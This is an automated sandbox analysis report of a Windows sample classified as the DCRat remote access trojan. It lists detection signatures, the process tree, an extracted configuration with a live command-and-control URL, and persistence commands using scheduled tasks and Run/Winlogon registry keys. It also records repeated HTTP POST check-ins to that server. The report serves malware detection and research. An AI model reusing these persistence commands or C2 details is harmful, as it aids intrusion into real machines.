Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ArELGBzuuF.exe

Overview

General Information

Sample name:ArELGBzuuF.exe
renamed because original name is a hash value
Original sample name:C410E5BDD0E37AB9D6B8EFC9B1B26B71.exe
Analysis ID:1581134
MD5:c410e5bdd0e37ab9d6b8efc9b1b26b71
SHA1:462c843a64da7007418da4f7d0609e08afb755de
SHA256:d0894a5628fab64b123fddcac95568a81b0f57298ae088a3ea548122b66d5f78
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Creates an undocumented autostart registry key
Creates processes via WMI
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • ArELGBzuuF.exe (PID: 7032 cmdline: "C:\Users\user\Desktop\ArELGBzuuF.exe" MD5: C410E5BDD0E37AB9D6B8EFC9B1B26B71)
    • schtasks.exe (PID: 1536 cmdline: schtasks.exe /create /tn "staticfiles" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Local\staticfile.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3788 cmdline: schtasks.exe /create /tn "staticfile" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\staticfile.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3452 cmdline: schtasks.exe /create /tn "staticfiles" /sc MINUTE /mo 12 /tr "'C:\Users\user\AppData\Local\staticfile.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • csc.exe (PID: 5764 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 2000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 5028 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB12E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCFB5D2BE025D440B3B78FE4AD3E8F4E5B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • csc.exe (PID: 4524 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sxun3xbz\sxun3xbz.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 1976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 5268 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB66E.tmp" "c:\Windows\System32\CSC97DCB281A28F42AF94908E122161F85F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • cmd.exe (PID: 6180 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3tz3CUwFBN.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 1816 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 6632 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • staticfile.exe (PID: 3176 cmdline: "C:\Users\user\AppData\Local\staticfile.exe" MD5: C410E5BDD0E37AB9D6B8EFC9B1B26B71)
  • staticfile.exe (PID: 5068 cmdline: C:\Users\user\AppData\Local\staticfile.exe MD5: C410E5BDD0E37AB9D6B8EFC9B1B26B71)
  • staticfile.exe (PID: 2132 cmdline: C:\Users\user\AppData\Local\staticfile.exe MD5: C410E5BDD0E37AB9D6B8EFC9B1B26B71)
  • staticfile.exe (PID: 3136 cmdline: "C:\Users\user\AppData\Local\staticfile.exe" MD5: C410E5BDD0E37AB9D6B8EFC9B1B26B71)
  • staticfile.exe (PID: 5648 cmdline: "C:\Users\user\AppData\Local\staticfile.exe" MD5: C410E5BDD0E37AB9D6B8EFC9B1B26B71)
  • staticfile.exe (PID: 3724 cmdline: "C:\Users\user\AppData\Local\staticfile.exe" MD5: C410E5BDD0E37AB9D6B8EFC9B1B26B71)
  • staticfile.exe (PID: 4820 cmdline: "C:\Users\user\AppData\Local\staticfile.exe" MD5: C410E5BDD0E37AB9D6B8EFC9B1B26B71)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://185.43.5.145/ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
ArELGBzuuF.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\staticfile.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.2021098488.0000000000582000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        00000016.00000002.3273686781.0000000002D85000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          Process Memory Space: ArELGBzuuF.exe PID: 7032JoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Process Memory Space: staticfile.exe PID: 4820JoeSecurity_DCRat_1Yara detected DCRatJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.0.ArELGBzuuF.exe.580000.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Files With System Process Name In Unsuspected Locations
                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 4524, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\staticfile.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ArELGBzuuF.exe, ProcessId: 7032, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\staticfile
                Sigma detected: CurrentVersion NT Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\user\AppData\Local\staticfile.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ArELGBzuuF.exe, ProcessId: 7032, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\ArELGBzuuF.exe", ParentImage: C:\Users\user\Desktop\ArELGBzuuF.exe, ParentProcessId: 7032, ParentProcessName: ArELGBzuuF.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.cmdline", ProcessId: 5764, ProcessName: csc.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "staticfiles" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Local\staticfile.exe'" /f, CommandLine: schtasks.exe /create /tn "staticfiles" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Local\staticfile.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\ArELGBzuuF.exe", ParentImage: C:\Users\user\Desktop\ArELGBzuuF.exe, ParentProcessId: 7032, ParentProcessName: ArELGBzuuF.exe, ProcessCommandLine: schtasks.exe /create /tn "staticfiles" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Local\staticfile.exe'" /f, ProcessId: 1536, ProcessName: schtasks.exe
                Sigma detected: Dynamic CSharp Compile Artefact
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\ArELGBzuuF.exe, ProcessId: 7032, TargetFilename: C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.cmdline

                Data Obfuscation

                barindex
                Sigma detected: Dot net compiler compiles file from suspicious location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\ArELGBzuuF.exe", ParentImage: C:\Users\user\Desktop\ArELGBzuuF.exe, ParentProcessId: 7032, ParentProcessName: ArELGBzuuF.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.cmdline", ProcessId: 5764, ProcessName: csc.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T04:02:39.212632+010020480951A Network Trojan was detected192.168.2.549750185.43.5.14580TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: ArELGBzuuF.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.43.5.145/ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.phpAvira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\staticfile.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                Source: C:\Users\user\AppData\Local\Temp\3tz3CUwFBN.batAvira: detection malicious, Label: BAT/Delbat.C
                Found malware configuration
                Source: ArELGBzuuF.exeMalware Configuration Extractor: DCRat {"C2 url": "http://185.43.5.145/ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\staticfile.exeReversingLabs: Detection: 78%
                Multi AV Scanner detection for submitted file
                Source: ArELGBzuuF.exeVirustotal: Detection: 60%Perma Link
                Source: ArELGBzuuF.exeReversingLabs: Detection: 78%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Local\staticfile.exeJoe Sandbox ML: detected
                Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: ArELGBzuuF.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: ArELGBzuuF.exeString decryptor: ["IMN6w7kNZ2IMaFpUfdyoSD51kVHI2FF8Ut5AHQFmvvouUktX7t2zntMFQVWbzbUUwK1rKoMPXM3hYLh9luKJMQUlgzuv3oxTaU8KtBNTgmbb0prEyXzFRLHgzQLU4bVt","43916a3ddb7d391681fec34f05a840c5608722484717d73ef9982e5fd0ce4199","0","","","5","2","WyIzIiwie1NZU1RFTURSSVZFfS9Vc2Vycy97VVNFUk5BTUV9L0FwcERhdGEvTG9jYWwvc3RhdGljZmlsZS5leGUiLCI1Il0=","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
                Source: ArELGBzuuF.exeString decryptor: [["http://185.43.5.145/ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/","providerEternalpacketupdateBigloaddefaultbaselinux"]]
                Source: ArELGBzuuF.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: ArELGBzuuF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.pdb source: ArELGBzuuF.exe, 00000000.00000002.2053915585.0000000002B77000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: 8C:\Users\user\AppData\Local\Temp\sxun3xbz\sxun3xbz.pdb source: ArELGBzuuF.exe, 00000000.00000002.2053915585.0000000002B77000.00000004.00000800.00020000.00000000.sdmp

                Spreading

                barindex
                Infects executable files (exe, dll, sys, html)
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeCode function: 4x nop then jmp 00007FF848F236D7h0_2_00007FF848F23660
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeCode function: 4x nop then jmp 00007FF848F2D958h0_2_00007FF848F2D785
                Source: C:\Users\user\AppData\Local\staticfile.exeCode function: 4x nop then dec eax22_2_00007FF848F2B989

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49750 -> 185.43.5.145:80
                Source: Joe Sandbox ViewASN Name: THEFIRST-ASRU THEFIRST-ASRU
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 380Expect: 100-continue
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continue
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1328Expect: 100-continue
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continue
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1040Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1328Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continue
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1044Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1328Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1044Expect: 100-continue
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1328Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continue
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1328Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 185.43.5.145Content-Length: 1048Expect: 100-continueConnection: Keep-Alive
